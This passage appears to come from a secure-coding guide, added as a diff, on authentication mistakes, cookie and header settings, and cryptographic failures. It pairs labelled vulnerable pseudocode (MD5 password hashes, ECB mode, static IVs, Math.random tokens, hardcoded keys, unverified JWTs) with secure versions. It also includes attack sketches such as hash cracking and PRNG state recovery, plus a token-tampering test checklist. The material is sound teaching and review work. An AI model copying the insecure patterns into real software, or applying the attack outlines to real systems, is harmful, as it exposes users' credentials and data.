logSecurityEvent("OAuth state mismatch", request) + return error("Invalid state") + + // Check state expiry (5 minutes) + if now() - stateCreatedAt > 300: + return error("OAuth session expired") + + // Clear state immediately (one-time use) + delete request.session.oauthState + delete request.session.oauthStateCreatedAt + + // Exchange code for tokens + tokenResponse = await exchangeCodeForTokens(code, CALLBACK_URL) + + if not tokenResponse.id_token: + return error("Missing ID token") + + // Validate ID token + idToken = verifyIdToken(tokenResponse.id_token, { + audience: CLIENT_ID, + nonce: request.session.oauthNonce // Verify nonce + }) + + delete request.session.oauthNonce + + if not idToken.valid: + return error("Invalid ID token") + + // Create or update user + user = findOrCreateUserFromOAuth(idToken.payload) + + // Create session with new session ID + createAuthenticatedSession(request, user) + + return redirect("/dashboard") +``` + +--- + +## Common Mistakes Section + +### Common Mistake 1: Checking User ID from Token Payload Without Verification + +```pseudocode +// VULNERABLE: Trusting unverified token payload +function getUserFromToken_vulnerable(token): + // Decodes token WITHOUT verification + decoded = base64Decode(token.split(".")[1]) + payload = JSON.parse(decoded) + + // Trusting the user ID from unverified payload! + return findUserById(payload.sub) + +// VULNERABLE: Verifying signature but using wrong data source +function getUser_vulnerable(request): + token = request.headers.authorization.replace("Bearer ", "") + + // Verify the token (good) + isValid = jwt.verify(token, secret) + + if isValid: + // But then extract user from request body (bad!) 
+ userId = request.body.userId + return findUserById(userId) + +// SECURE: Always use verified payload +function getUserFromToken_secure(token): + try: + // Verify and decode in one operation + decoded = jwt.verify(token, secret, { algorithms: ["HS256"] }) + + // Use the verified payload, not a separate data source + return findUserById(decoded.sub) + catch: + return null + +// SECURE: Middleware that sets verified user +function authMiddleware(request, next): + token = extractTokenFromRequest(request) + + if not token: + return unauthorized() + + try: + verified = jwt.verify(token, secret, { + algorithms: ["HS256"], + issuer: "myapp" + }) + + // Set user from VERIFIED token only + request.user = { + id: verified.sub, + email: verified.email, + role: verified.role + } + + return next() + catch: + return unauthorized() +``` + +--- + +### Common Mistake 2: Not Invalidating Old Sessions + +```pseudocode +// VULNERABLE: Password change doesn't invalidate sessions +function changePassword_vulnerable(request, oldPassword, newPassword): + user = request.user + + if verifyPassword(oldPassword, user.hashedPassword): + user.hashedPassword = hashPassword(newPassword) + user.save() + return success("Password changed") + + return error("Wrong password") + // Existing sessions remain valid! Attacker still logged in + +// VULNERABLE: Role change doesn't update session +function demoteUser_vulnerable(userId): + user = findUserById(userId) + user.role = "basic" + user.save() + // User's existing sessions still have old role! 
+ return success() + +// SECURE: Invalidate sessions on security-sensitive changes +function changePassword_secure(request, oldPassword, newPassword): + user = request.user + + if not verifyPassword(oldPassword, user.hashedPassword): + return error("Wrong password") + + // Update password + user.hashedPassword = hashPassword(newPassword) + user.passwordChangedAt = now() + user.save() + + // Invalidate ALL sessions except current (or including current) + currentSessionId = request.session.id + sessions = getAllSessionsForUser(user.id) + + for session in sessions: + if session.id != currentSessionId: // Keep current or invalidate all + deleteSession(session.id) + + // Revoke all refresh tokens + revokeAllRefreshTokensForUser(user.id) + + // Optional: Force re-authentication + regenerateSession(request) + + return success("Password changed. Other sessions logged out.") + +// SECURE: Track password change timestamp in tokens +function validateToken_withPasswordCheck(token): + decoded = jwt.verify(token, secret) + + user = findUserById(decoded.sub) + + // Check if token was issued before password change + if decoded.iat < user.passwordChangedAt: + return { valid: false, error: "Password changed since token issued" } + + return { valid: true, payload: decoded } +``` + +--- + +### Common Mistake 3: SameSite Cookie Misunderstanding + +```pseudocode +// VULNERABLE: Using Lax when Strict is needed +function setSessionCookie_wrongSameSite(response, sessionId): + response.setCookie("session_id", sessionId, { + httpOnly: true, + secure: true, + sameSite: "Lax" // Allows cookie on top-level navigation + // Attacker can CSRF via: + }) + +// VULNERABLE: Omitting SameSite (defaults vary by browser) +function setSessionCookie_noSameSite(response, sessionId): + response.setCookie("session_id", sessionId, { + httpOnly: true, + secure: true + // SameSite not specified - browser-dependent behavior + }) + +// VULNERABLE: Using None without understanding implications +function 
setSessionCookie_sameNone(response, sessionId): + response.setCookie("session_id", sessionId, { + httpOnly: true, + secure: true, + sameSite: "None" // Sent on ALL cross-site requests - CSRF vulnerable! + }) + +// GUIDE: When to use each SameSite value + +// STRICT: Most secure, use for sensitive auth cookies +// - Cookie NOT sent on any cross-site request +// - User clicking link from email to your site won't be logged in +// - Best for: Banking, admin panels, security-critical apps +function setStrictCookie(response, sessionId): + response.setCookie("session_id", sessionId, { + httpOnly: true, + secure: true, + sameSite: "Strict" + }) + +// LAX: Balance of security and usability +// - Cookie sent on top-level GET navigation (clicking links) +// - NOT sent on cross-site POST, images, iframes +// - Good for: General user sessions where link-sharing matters +// - STILL NEED CSRF tokens for POST/PUT/DELETE endpoints! +function setLaxCookie(response, sessionId): + response.setCookie("session_id", sessionId, { + httpOnly: true, + secure: true, + sameSite: "Lax" + }) + // Additional CSRF protection still recommended + +// NONE: Only for cross-site embedding needs +// - Cookie sent on ALL requests including cross-site +// - REQUIRES Secure attribute (HTTPS only) +// - Only use for: OAuth flows, embedded widgets, intentional cross-site use +function setNoneCookie_onlyWhenNeeded(response, oauthToken): + response.setCookie("oauth_continuation", oauthToken, { + httpOnly: true, + secure: true, // REQUIRED with SameSite=None + sameSite: "None", + maxAge: 300 // Short-lived for specific purpose + }) +``` + +--- + +## Security Header Configurations + +```pseudocode +// SECURE: Complete security headers for authentication +function setSecurityHeaders(response): + // Prevent clickjacking (don't allow embedding in frames) + response.setHeader("X-Frame-Options", "DENY") + + // Content Security Policy (frame-ancestors is the modern clickjacking protection) + response.setHeader("Content-Security-Policy", + "default-src 'self'; " + + 
"script-src 'self'; " + + "style-src 'self' 'unsafe-inline'; " + + "frame-ancestors 'none'; " + + "form-action 'self'" + ) + + // Prevent MIME type sniffing + response.setHeader("X-Content-Type-Options", "nosniff") + + // Disable the legacy browser XSS filter (it can itself introduce flaws; rely on CSP) + response.setHeader("X-XSS-Protection", "0") + + // Only allow HTTPS + response.setHeader("Strict-Transport-Security", + "max-age=31536000; includeSubDomains; preload" + ) + + // Control referrer information + response.setHeader("Referrer-Policy", "strict-origin-when-cross-origin") + + // Disable sensitive browser features via Permissions-Policy + response.setHeader("Permissions-Policy", + "geolocation=(), camera=(), microphone=(), payment=()" + ) + + // Cache control for authenticated pages + response.setHeader("Cache-Control", + "no-store, no-cache, must-revalidate, private" + ) + response.setHeader("Pragma", "no-cache") + response.setHeader("Expires", "0") + +// SECURE: Login page specific headers +function setLoginPageHeaders(response): + setSecurityHeaders(response) + + // Stricter CSP for the login page (overrides the general policy set above) + response.setHeader("Content-Security-Policy", + "default-src 'self'; " + + "script-src 'self'; " + + "style-src 'self'; " + + "form-action 'self'; " + // Forms only submit to same origin + "frame-ancestors 'none'; " + // Prevent clickjacking + "base-uri 'self'" // Prevent base tag injection + ) + +// SECURE: API endpoint headers +function setApiHeaders(response): + // API responses shouldn't be cached + response.setHeader("Cache-Control", "no-store") + + // Prevent MIME type sniffing + response.setHeader("X-Content-Type-Options", "nosniff") + + // CORS configuration (adjust based on needs) + response.setHeader("Access-Control-Allow-Origin", + getAllowedOrigin()) // Not "*" for authenticated APIs! 
+ response.setHeader("Access-Control-Allow-Credentials", "true") + response.setHeader("Access-Control-Allow-Methods", + "GET, POST, PUT, DELETE, OPTIONS") + response.setHeader("Access-Control-Allow-Headers", + "Content-Type, Authorization") +``` + +--- + +## Detection Hints: How to Spot Authentication Issues + +### Code Review Patterns + +```pseudocode +// RED FLAGS in authentication code: + +// 1. Missing algorithm specification in JWT verification +jwt.verify(token, secret) // BAD - should specify algorithms +jwt.decode(token) // BAD - decode doesn't verify! + +// 2. Session not regenerated after login +request.session.userId = user.id // Search for: session assignment without regenerate + +// 3. Tokens in localStorage +localStorage.setItem("token" // Search for: localStorage.*token + +// 4. No HttpOnly on session cookies +setCookie("session", id) // Search for: setCookie without httpOnly + +// 5. Weak secrets +JWT_SECRET = "secret" // Search for: SECRET.*=.*["'] + +// 6. No expiration +jwt.sign(payload, secret) // Without expiresIn + +// 7. Password comparison without constant-time +if password == storedHash // Direct comparison + +// 8. No rate limiting on login +function login(email, password) // Check for rate limit before auth logic + +// GREP patterns for security review: +// localStorage\.setItem.*token +// sessionStorage\.setItem.*token +// jwt\.decode\s*\( +// jwt\.verify\s*\([^,]+,[^,]+\s*\) (missing options) +// sameSite.*None +// password.*== +// \.secret\s*=\s*["'] +``` + +### Security Testing Checklist + +```pseudocode +// Authentication security test cases: + +// 1. Token manipulation tests +- [ ] Change JWT algorithm to "none" and remove signature +- [ ] Modify JWT payload (role, user ID) and check if accepted +- [ ] Use expired token +- [ ] Use token with wrong issuer/audience + +// 2. 
Session tests +- [ ] Check if session ID changes after login +- [ ] Attempt session fixation (set session ID before login) +- [ ] Check session timeout enforcement +- [ ] Verify logout actually invalidates session + +// 3. Password tests +- [ ] Test common passwords (password123, qwerty, etc.) +- [ ] Test password length limits (very long passwords) +- [ ] Check password reset token predictability +- [ ] Verify password reset invalidates old tokens + +// 4. Cookie tests +- [ ] Check HttpOnly flag on session cookies +- [ ] Check Secure flag on session cookies +- [ ] Test SameSite enforcement +- [ ] Verify cookie scope (path, domain) + +// 5. Rate limiting tests +- [ ] Attempt rapid login failures +- [ ] Check for account lockout +- [ ] Test rate limit bypass (different IPs, headers) + +// 6. OAuth tests +- [ ] Test with missing state parameter +- [ ] Test with reused state parameter +- [ ] Check redirect_uri validation +``` + +--- + +## Security Checklist + +- [ ] Passwords validated against common password list and breach databases +- [ ] Password hashing uses bcrypt, argon2, or scrypt with appropriate work factor +- [ ] Session IDs generated with cryptographically secure random +- [ ] Session regenerated after authentication and privilege changes +- [ ] JWT algorithm explicitly specified (not derived from token) +- [ ] JWT "none" algorithm explicitly rejected +- [ ] JWT secrets are strong (256+ bits) and stored securely +- [ ] JWT expiration is short for access tokens (15-30 minutes) +- [ ] Refresh token rotation implemented +- [ ] Tokens can be revoked server-side (blacklist or session binding) +- [ ] Authentication cookies have HttpOnly, Secure, and appropriate SameSite +- [ ] Tokens stored in HttpOnly cookies, not localStorage/sessionStorage +- [ ] Rate limiting implemented on login endpoints +- [ ] Account lockout after repeated failures +- [ ] Constant-time comparison used for password/token verification +- [ ] Password reset tokens are cryptographically 
random and single-use +- [ ] Password change invalidates existing sessions +- [ ] OAuth state parameter is random and validated +- [ ] Security headers configured (HSTS, CSP, X-Frame-Options, etc.) +- [ ] Logout invalidates session/tokens server-side +- [ ] "Logout from all devices" functionality available + +--- + +# Pattern 5: Cryptographic Failures + +**CWE References:** CWE-327 (Use of a Broken or Risky Cryptographic Algorithm), CWE-328 (Reversible One-Way Hash), CWE-329 (Not Using a Random IV with CBC Mode), CWE-330 (Use of Insufficiently Random Values), CWE-331 (Insufficient Entropy), CWE-338 (Use of Cryptographically Weak PRNG), CWE-916 (Use of Password Hash With Insufficient Computational Effort) + +**Priority Score:** 18-20 (Frequency: 7, Severity: 9, Detectability: 4-6) + +--- + +## Introduction: Crypto is Hard—AI Often Copies Deprecated Patterns + +Cryptographic implementations represent one of the most perilous areas in security-sensitive code. AI models are particularly prone to generating insecure cryptographic patterns due to several compounding factors: + +**Why AI Models Generate Weak Cryptography:** + +1. **Training Data Time Lag:** Cryptographic best practices evolve continuously. Training data contains years of outdated tutorials, Stack Overflow answers, and documentation recommending algorithms now considered broken (MD5, SHA1, DES, RC4). AI models cannot distinguish between "worked in 2015" and "secure in 2025." + +2. **Tutorial Simplification:** Educational materials often use simplified crypto examples to teach concepts—MD5 for demonstration, short keys for readability, static IVs for reproducibility. AI learns these "teaching patterns" as valid implementations. + +3. **Copy-Paste Prevalence:** Cryptographic code is frequently copied rather than understood. Training data reflects this—the same insecure patterns appear thousands of times across repositories, reinforcing incorrect approaches. + +4. 
**API Complexity Hides Danger:** Modern cryptographic libraries have complex APIs where default parameters may be insecure. AI generates code that "works" by using defaults without understanding that those defaults may lack semantic security or authentication (ECB mode) or use weak key derivation. + +5. **Security vs. Convenience Trade-offs:** AI models optimize for code that compiles and runs. Cryptographic security often requires additional steps (proper IV generation, authenticated modes, key derivation) that AI omits for simplicity. + +6. **Cross-Language Confusion:** Cryptographic APIs vary dramatically between languages. AI conflates patterns from different ecosystems, generating hybrid code that may compile but violates security assumptions of both libraries. + +**Impact Statistics:** + +- **29%** of data breaches involve cryptographic failures (Verizon DBIR 2024) +- "Cryptographic Failures" ranks **#2** (A02) in the OWASP Top 10 2021 +- **62%** of AI-generated code samples use MD5 or SHA1 for password hashing (Security research 2024) +- Cost of a breach due to weak encryption: **$4.8 million** average (IBM Cost of a Data Breach 2024) +- **40%** of applications still use broken cryptographic algorithms in production (Veracode State of Software Security) + +--- + +## BAD Examples: Multiple Manifestations + +### BAD Example 1: MD5/SHA1 for Password Hashing + +```pseudocode +// VULNERABLE: MD5 for password hashing +function hashPassword(password): + return md5(password) + +// VULNERABLE: SHA1 for password storage +function storePassword(userId, password): + hashedPassword = sha1(password) + database.update("users", userId, {"password": hashedPassword}) + +// VULNERABLE: Single-round SHA256 (still too fast) +function createPasswordHash(password): + return sha256(password) + +// VULNERABLE: Unsalted hash +function verifyPassword(inputPassword, storedHash): + return sha256(inputPassword) == storedHash + +// VULNERABLE: Simple salt without proper KDF +function 
hashWithSalt(password, salt): + return sha256(salt + password) + +// VULNERABLE: MD5 with salt (still MD5) +function improvedHash(password): + salt = generateRandomBytes(16) + hash = md5(salt + password) + return salt + ":" + hash +``` + +**Why This Is Dangerous:** +- MD5 produces collisions in seconds on modern hardware +- SHA1 collision attacks are practical (SHAttered attack, 2017) +- Even SHA256 is too fast for password hashing: GPUs compute billions of hashes per second +- Unsalted hashes enable rainbow table attacks +- A single salted hash (sha256(salt + password)) defeats rainbow tables but is still fast to brute-force +- Password cracking rigs can test 180 billion MD5 hashes per second + +**Attack Scenario:** +```pseudocode +// Attacker steals database with MD5 password hashes +// Using hashcat on modern GPU: + +hashcat_speed = 180_000_000_000 // 180 billion MD5/second +common_passwords = 1_000_000_000 // 1 billion common passwords + +time_to_crack_all = common_passwords / hashcat_speed +// Result: ~0.0056 seconds (about 5.6 ms) to check ALL common passwords against ALL unsalted hashes + +// Even SHA256 is fast: +sha256_speed = 23_000_000_000 // 23 billion SHA256/second +// 1_000_000_000 / 23_000_000_000 = ~0.043 seconds for the same billion-password list +``` + +--- + +### BAD Example 2: ECB Mode Encryption + +```pseudocode +// VULNERABLE: ECB mode reveals patterns +function encryptData(plaintext, key): + cipher = createCipher("AES", key, mode = "ECB") + return cipher.encrypt(plaintext) + +// VULNERABLE: Default mode may be ECB in some libraries +function simpleEncrypt(data, key): + cipher = AES.new(key) // Some libraries default to ECB! 
+ return cipher.encrypt(padData(data)) + +// VULNERABLE: Explicit ECB for "simplicity" +function encryptUserData(userData, encryptionKey): + algorithm = "AES/ECB/PKCS5Padding" // Java-style + cipher = Cipher.getInstance(algorithm) + cipher.init(ENCRYPT_MODE, encryptionKey) + return cipher.doFinal(userData) + +// VULNERABLE: Assuming any AES is secure +function protectSensitiveData(data, key): + // "AES is strong encryption" - but ECB mode is not + encryptor = AESEncryptor(key, mode = "ECB") + return encryptor.encrypt(data) +``` + +**Why This Is Dangerous:** +- ECB encrypts identical plaintext blocks to identical ciphertext blocks +- Patterns in plaintext are preserved in ciphertext +- Famous example: ECB-encrypted images show the original image outline +- No semantic security—attacker learns information about plaintext structure +- Block manipulation attacks possible (swap, delete, duplicate blocks) + +**Visual Demonstration:** +```pseudocode +// Original image (bitmap of a penguin): +// ████████████████ +// ██ ████ ██ +// ██ ██████ ██ +// ██████████████ +// ████ ████████ +// ████████████████ + +// After ECB encryption: +// ???????????????? ← Still shows penguin shape! +// ?? ???? ?? ← Identical colors → identical ciphertext +// ?? ?????? ?? +// ?????????????? +// ???? ???????? +// ???????????????? + +// After CBC/GCM encryption: +// ???????????????? ← Random appearance +// ???????????????? ← No pattern visible +// ???????????????? +// ???????????????? +// ???????????????? +// ???????????????? 
+``` + +--- + +### BAD Example 3: Static IVs / Nonces + +```pseudocode +// VULNERABLE: Hardcoded IV +STATIC_IV = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]) + +function encryptMessage(plaintext, key): + cipher = AES.new(key, AES.MODE_CBC, iv = STATIC_IV) + return cipher.encrypt(padData(plaintext)) + +// VULNERABLE: Same IV for all encryptions +class Encryptor: + IV = generateRandomBytes(16) // Generated ONCE at startup + + function encrypt(data, key): + cipher = createCipher("AES-CBC", key, this.IV) + return cipher.encrypt(data) + +// VULNERABLE: In-memory counter nonce that restarts at 0 (no random prefix, not persisted) +nonce_counter = 0 +function encryptWithNonce(plaintext, key): + nonce_counter = nonce_counter + 1 + nonce = intToBytes(nonce_counter, 12) // Repeats after every restart and across instances sharing the key! + return AES_GCM_encrypt(key, nonce, plaintext) + +// VULNERABLE: IV derived from predictable data +function encryptRecord(userId, data, key): + iv = sha256(toString(userId))[:16] // Same IV for same user! + return AES_CBC_encrypt(key, iv, data) + +// VULNERABLE: Timestamp-based IV +function timeBasedEncrypt(data, key): + iv = sha256(toString(getCurrentTimestamp()))[:16] + return AES_CBC_encrypt(key, iv, data) + // Problem: Collisions if encrypted in same second, and the IV is predictable +``` + +**Why This Is Dangerous:** +- Same IV + same key = identical ciphertext for identical plaintext (breaks semantic security) +- In CBC mode: IV reuse reveals whether two messages share a common prefix +- In CTR mode: key stream reuse → XOR of plaintexts recoverable +- In GCM mode: nonce reuse is catastrophic: the authentication key can be recovered and messages forged +- Predictable IVs in CBC mode enable chosen-plaintext attacks + +**GCM Nonce Reuse Attack:** +```pseudocode +// If same nonce used twice with same key in GCM: +// Message 1: plaintext1, ciphertext1, tag1 +// Message 2: plaintext2, ciphertext2, tag2 + +// Attacker can compute: +// - XOR of plaintext1 and plaintext2 +// - Eventually recover the authentication key H +// - Forge arbitrary messages with valid tags + +// This is a 
CATASTROPHIC failure of GCM mode +// "Nonce misuse resistance" modes exist (GCM-SIV) for this reason +``` + +--- + +### BAD Example 4: Math.random() for Security + +```pseudocode +// VULNERABLE: Math.random for token generation +function generateResetToken(): + token = "" + for i in range(32): + token = token + toString(floor(random() * 16), base = 16) + return token + +// VULNERABLE: Math.random for session ID +function createSessionId(): + return "session_" + toString(random() * 1000000000) + +// VULNERABLE: Seeded random with predictable seed +function generateApiKey(userId): + setSeed(userId * getCurrentTimestamp()) + key = "" + for i in range(32): + key = key + randomChoice(ALPHANUMERIC_CHARS) + return key + +// VULNERABLE: Using non-crypto random for encryption IV +function quickEncrypt(data, key): + iv = [] + for i in range(16): + iv.append(floor(random() * 256)) + return AES_CBC_encrypt(key, iv, data) + +// VULNERABLE: JavaScript Math.random() is NOT cryptographic +function generateToken(): + return btoa(String.fromCharCode.apply(null, + Array.from({length: 32}, () => Math.floor(Math.random() * 256)) + )) +``` + +**Why This Is Dangerous:** +- Math.random() is backed by a non-cryptographic, predictable pseudo-random number generator (PRNG) +- Internal state can be recovered from a modest number of observed outputs (V8's xorshift128+ has only 128 bits of state; a Mersenne Twister needs 624 consecutive 32-bit outputs) +- Once state is known, all past and future values are predictable +- Session tokens, API keys, and reset tokens become guessable +- Many PRNG implementations have short periods or weak seeding + +**State Recovery Attack:** +```pseudocode +// Attacker collects multiple password reset tokens +tokens_observed = [ + "a3f7c2e9b1d4...", // Token 1 + "8e2a5f1c9b3d...", // Token 2 + // ... 
collect ~30-50 tokens +] + +// Using z3 SMT solver or custom reversing: +function recoverMathRandomState(observed_outputs): + // V8's xorshift128+ can be reversed + // Once state recovered, predict next token + state = reverseEngineerState(observed_outputs) + next_token = predictNextOutput(state) + return next_token + +// Attacker generates password reset for victim +// Then predicts the token value +// Completes password reset without email access +``` + +--- + +### BAD Example 5: Hardcoded Symmetric Keys + +```pseudocode +// VULNERABLE: Key in source code +ENCRYPTION_KEY = "MySecretKey12345" + +function encryptUserData(data): + return AES_encrypt(ENCRYPTION_KEY, data) + +// VULNERABLE: Key derived from application constant +function getEncryptionKey(): + return sha256(APPLICATION_NAME + ENVIRONMENT + "secret") + +// VULNERABLE: Same key for all users +MASTER_KEY = bytes.fromhex("0123456789abcdef0123456789abcdef") + +function encryptForUser(userId, data): + return AES_encrypt(MASTER_KEY, data) + +// VULNERABLE: Key in configuration file (committed to git) +// config.py: +CRYPTO_CONFIG = { + "encryption_key": "dGhpcyBpcyBhIHNlY3JldCBrZXk=", // Base64 encoded + "hmac_key": "another_secret_key_here" +} + +// VULNERABLE: Weak key (too short) +function quickEncrypt(data): + key = "short" // 5 bytes, not 16/24/32 + return AES_encrypt(pad(key, 16), data) // Padded with zeros! 
+``` + +**Why This Is Dangerous:** +- Keys in source code are exposed in version control history forever +- Hardcoded keys cannot be rotated without code deployment +- Compilation/decompilation exposes keys in binaries +- Single key compromise affects all encrypted data +- Weak/short keys can be brute-forced +- Key derivation from predictable inputs allows reconstruction + +--- + +### BAD Example 6: Weak Key Derivation + +```pseudocode +// VULNERABLE: Direct use of password as key +function deriveKey(password): + return password.encode()[:32] // Truncate or pad to key size + +// VULNERABLE: Simple hash as key derivation +function passwordToKey(password): + return sha256(password) // Single round, no salt + +// VULNERABLE: MD5-based key derivation +function getKeyFromPassword(password, salt): + return md5(password + salt) + +// VULNERABLE: Insufficient iterations +function deriveKeyPBKDF2(password, salt): + return PBKDF2(password, salt, iterations = 1000) + // 2025 recommendation: minimum 600,000 for SHA256 + +// VULNERABLE: Using key derivation output directly for multiple purposes +function setupCrypto(password, salt): + derived = PBKDF2(password, salt, iterations = 100000, keyLength = 64) + encryptionKey = derived[:32] // First half + hmacKey = derived[32:] // Second half + // Problem: related keys, should use separate derivations + +// VULNERABLE: Weak salt (too short, predictable, or reused) +function deriveKeyWithWeakSalt(password): + salt = "salt" // Static salt defeats purpose + return PBKDF2(password, salt, iterations = 100000) +``` + +**Why This Is Dangerous:** +- Direct password use gives attackers dictionary attack advantage +- Single-hash derivation enables GPU-accelerated brute force +- Low iteration counts make PBKDF2/bcrypt fast to attack +- MD5 key derivation inherits all MD5 weaknesses +- Static/weak salt enables precomputation attacks +- Related key derivation can expose cryptographic weaknesses + +**Iteration Count Guidance (2025):** 
+```pseudocode +// PBKDF2-SHA256 minimum iterations by use case: +// - Interactive login (100ms budget): 600,000 iterations +// - Background/async (1s budget): 2,000,000 iterations +// - High-security (offline storage): 10,000,000 iterations + +// bcrypt cost factor: +// - Minimum 2025: cost = 12 (about 250ms) +// - Recommended: cost = 13-14 +// - High-security: cost = 15+ + +// Argon2id parameters (2025): +// - Memory: 64 MB minimum, 256 MB recommended +// - Iterations: 3 minimum +// - Parallelism: match available cores +// - Argon2id recommended over Argon2i or Argon2d +``` + +--- + +## GOOD Examples: Secure Cryptographic Patterns + +### GOOD Example 1: Proper Password Hashing with bcrypt/Argon2 + +```pseudocode +// SECURE: bcrypt with appropriate cost factor +function hashPassword(password): + // Cost factor 12 = ~250ms on modern hardware + // Increase cost factor annually as hardware improves + cost = 12 + return bcrypt.hash(password, cost) + +function verifyPassword(password, storedHash): + // bcrypt.verify handles timing-safe comparison internally + return bcrypt.verify(password, storedHash) + +// SECURE: Argon2id (recommended for new applications) +function hashPasswordArgon2(password): + // Argon2id: hybrid resistant to both side-channel and GPU attacks + options = { + type: ARGON2ID, + memoryCost: 65536, // 64 MB + timeCost: 3, // 3 iterations + parallelism: 4, // 4 parallel threads + hashLength: 32 // 256-bit output + } + return argon2.hash(password, options) + +function verifyPasswordArgon2(password, storedHash): + return argon2.verify(storedHash, password) + +// SECURE: scrypt for memory-hard hashing +function hashPasswordScrypt(password): + // N = CPU/memory cost (power of 2) + // r = block size + // p = parallelization parameter + salt = generateSecureRandom(16) + hash = scrypt(password, salt, N = 2^17, r = 8, p = 1, keyLen = 32) + return encodeSaltAndHash(salt, hash) + +// SECURE: Migrating from weak to strong hashing +function 
upgradePasswordHash(userId, password, currentHash): + // Verify against old hash + if legacyVerify(password, currentHash): + // Re-hash with modern algorithm + newHash = hashPasswordArgon2(password) + database.update("users", userId, {"password_hash": newHash}) + return true + return false +``` + +**Why This Is Secure:** +- bcrypt, Argon2, and scrypt are deliberately slow; Argon2 and scrypt are also memory-hard +- bcrypt and Argon2 libraries generate a salt and store it inside the hash string (the scrypt example manages its salt explicitly) +- Timing-safe comparison built into verify functions +- Configurable work factors allow future-proofing +- Argon2id is designed to resist both GPU attacks and side-channel attacks + +--- + +### GOOD Example 2: Authenticated Encryption (GCM Mode) + +```pseudocode +// SECURE: AES-256-GCM with proper nonce handling +function encryptAESGCM(plaintext, key): + // Generate cryptographically random 96-bit nonce + nonce = generateSecureRandom(12) + + cipher = createCipher("AES-256-GCM", key) + cipher.setNonce(nonce) + + // Optional: Add authenticated additional data (AAD) + // AAD is authenticated but NOT encrypted + aad = "context:user_data:v1" + cipher.setAAD(aad) + + ciphertext = cipher.encrypt(plaintext) + authTag = cipher.getAuthTag() // 128-bit tag + + // Return nonce + tag + ciphertext (all needed for decryption) + return nonce + authTag + ciphertext + +function decryptAESGCM(encryptedData, key): + // Extract components + nonce = encryptedData[:12] + authTag = encryptedData[12:28] + ciphertext = encryptedData[28:] + + cipher = createCipher("AES-256-GCM", key) + cipher.setNonce(nonce) + cipher.setAAD("context:user_data:v1") // Must match encryption + cipher.setAuthTag(authTag) + + try: + plaintext = cipher.decrypt(ciphertext) + return plaintext + catch AuthenticationError: + // Tag verification failed - data tampered or wrong key + log.warn("Decryption authentication failed - possible tampering") + return null + +// SECURE: XChaCha20-Poly1305 (extended nonce variant) +function encryptXChaCha(plaintext, key): + // 192-bit nonce - safe for random generation + 
nonce = generateSecureRandom(24) + + ciphertext, tag = xchachapoly.encrypt(key, nonce, plaintext) + + return nonce + tag + ciphertext +``` + +**Why This Is Secure:** +- GCM provides both confidentiality AND integrity +- Authentication tag detects any tampering +- 96-bit nonces are safe for random generation up to ~2^32 messages per key +- XChaCha20-Poly1305 has a 192-bit nonce, so random nonces are safe for a practically unlimited number of messages +- AAD allows binding ciphertext to context (prevents cross-context attacks) + +--- + +### GOOD Example 3: Proper IV/Nonce Generation + +```pseudocode +// SECURE: Random IV for CBC mode +// Note: CBC alone provides no integrity; pair it with an HMAC (encrypt-then-MAC) or prefer GCM +function encryptCBC(plaintext, key): + // 128-bit random IV for AES + iv = generateSecureRandom(16) + + cipher = createCipher("AES-256-CBC", key) + ciphertext = cipher.encrypt(plaintext, iv) + + // Prepend IV to ciphertext (IV doesn't need to be secret) + return iv + ciphertext + +function decryptCBC(encryptedData, key): + iv = encryptedData[:16] + ciphertext = encryptedData[16:] + + cipher = createCipher("AES-256-CBC", key) + return cipher.decrypt(ciphertext, iv) + +// SECURE: Counter-based nonce with random prefix (for GCM) +class SecureNonceGenerator: + // Random 32-bit prefix + 64-bit counter + // Up to 2^64 nonces per generator instance; the prefix makes collisions across instances unlikely, not impossible + + function __init__(): + this.prefix = generateSecureRandom(4) // 32-bit random + this.counter = 0 + this.lock = Mutex() + + function generate(): + this.lock.acquire() + try: + this.counter = this.counter + 1 + if this.counter >= 2^64: + throw Error("Nonce counter exhausted - rotate key") + return this.prefix + intToBytes(this.counter, 8) + finally: + this.lock.release() // Released even when the exhaustion error is thrown + +// SECURE: Synthetic IV (SIV) for nonce-misuse resistance +function encryptSIV(plaintext, key): + // AES-GCM-SIV: Safe even if nonce is accidentally repeated + // Note: a repeated nonce only reveals whether the same plaintext was encrypted twice + nonce = generateSecureRandom(12) + ciphertext = AES_GCM_SIV_encrypt(key, nonce, plaintext) + return nonce + ciphertext +``` + +**Why This Is Secure:** +- 
Random IVs prevent pattern analysis across messages +- Prepending IV to ciphertext ensures IV is always available for decryption +- Counter with random prefix makes nonce collisions across instances unlikely +- SIV modes provide safety net against accidental nonce reuse + +--- + +### GOOD Example 4: Cryptographically Secure Random + +```pseudocode +// SECURE: Using OS/platform CSPRNG + +// Node.js +function generateSecureRandom(length): + return crypto.randomBytes(length) + +// Python +function generateSecureRandom(length): + return secrets.token_bytes(length) + +// Java +function generateSecureRandom(length): + // getInstanceStrong() may block on some platforms; new SecureRandom() is usually sufficient + random = SecureRandom.getInstanceStrong() + bytes = new byte[length] + random.nextBytes(bytes) + return bytes + +// Go +function generateSecureRandom(length): + bytes = make([]byte, length) + _, err = crypto_rand.Read(bytes) + if err != nil: + panic("CSPRNG failure") + return bytes + +// SECURE: Token generation for URLs/APIs +function generateUrlSafeToken(length): + // Generate random bytes, encode to URL-safe base64 + randomBytes = generateSecureRandom(length) + return base64UrlEncode(randomBytes) + +function generateResetToken(): + // 256 bits of entropy for password reset token + return generateUrlSafeToken(32) + +function generateApiKey(): + // Prefix for identification + random component + prefix = "sk_live_" + randomPart = generateUrlSafeToken(24) + return prefix + randomPart + +// SECURE: Random number in range +function secureRandomInt(min, max): + range = max - min + 1 + if range == 1: + return min // Only one possible value; no randomness needed + bytesNeeded = ceil(log2(range) / 8) + + // Rejection sampling to avoid modulo bias: + // accept only values below the largest multiple of range + limit = floor(2^(bytesNeeded*8) / range) * range + while true: + randomBytes = generateSecureRandom(bytesNeeded) + value = bytesToInt(randomBytes) + if value < limit: + return min + (value % range) +``` + +**Why This Is Secure:** +- CSPRNG (Cryptographically Secure PRNG) uses OS entropy sources +- Future outputs cannot be predicted even with complete knowledge of previous outputs +- Proper rejection sampling avoids modulo bias +- Standard libraries 
